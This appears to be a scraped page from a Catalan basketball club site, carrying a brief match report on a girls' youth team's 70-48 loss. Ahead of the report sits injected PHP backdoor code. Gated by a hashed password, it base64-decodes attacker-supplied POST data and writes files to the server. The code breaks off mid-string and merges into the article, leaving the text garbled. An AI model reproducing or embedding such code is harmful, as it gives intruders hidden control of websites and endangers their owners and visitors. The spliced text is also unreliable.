function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El preinfantil femení A aguanta l'embranzida del Femení Maresme durant mig partit (70-48) - Tgn Bàsquet Club -

El preinfantil femení A aguanta l’embranzida del Femení Maresme durant mig partit (70-48)

Updated: abril 2, 2019

L’equip preinfantil femení A va perdre contra un rival superior, el Femení Maresme Llavaneres, en un partit on les jugadores qu entrena Agustí Oriol, però, van plantar cara durant mig partit. El TGN Bàsquet va fer uns bons primers deu minuts i va dominar en el resultat però en el segon quart, les locals van reaccionar i van arribar al descans amb un petit avantatge, 30-25. A la represa, el Femení Maresme Llavaneres va mostrar la seva qualitat i va estar molt més encertat de cara a cistella tot i la lluita de les tarragonines que no van evitar, però, la derrota.